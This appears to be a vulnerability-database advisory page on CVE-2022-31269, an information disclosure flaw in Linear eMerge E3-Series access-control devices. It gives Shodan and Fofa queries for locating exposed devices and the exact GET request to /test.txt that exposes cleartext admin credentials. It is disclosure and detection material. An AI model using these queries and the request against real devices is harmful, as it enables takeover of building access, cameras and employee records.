🔙 목록으로 돌아가기

CVE-2022-31269: Linear eMerge E3-Series - Information Disclosure

TitleLinear eMerge E3-Series - Information Disclosure
AuthorFor3stCo1d
SeverityHigh
ImpactAn attacker can exploit this vulnerability to gain sensitive information from the device.
RemediationApply the latest firmware update provided by the vendor to fix the vulnerability.
CVSS Score8.2
EPSS Score0.6816
CVE IDCVE-2022-31269
CWE IDCWE-798
Shodan Queryhttp.title:"Linear eMerge"http.title:"emerge"http.title:"linear emerge"
Fofa Querytitle="emerge"title="linear emerge"
Tags cve cve2022 emerge exposure packetstorm nortekcontrol vuln

🔍 Vulnerability Description

Linear eMerge E3-Series devices are susceptible to information disclosure. Admin credentials are stored in clear text at the endpoint /test.txt in situations where the default admin credentials have been changed. An attacker can obtain admin credentials, access the admin dashboard, control building access and cameras, and access employee information.

🌐 HTTP Request

GET /test.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-31269.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-31269.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A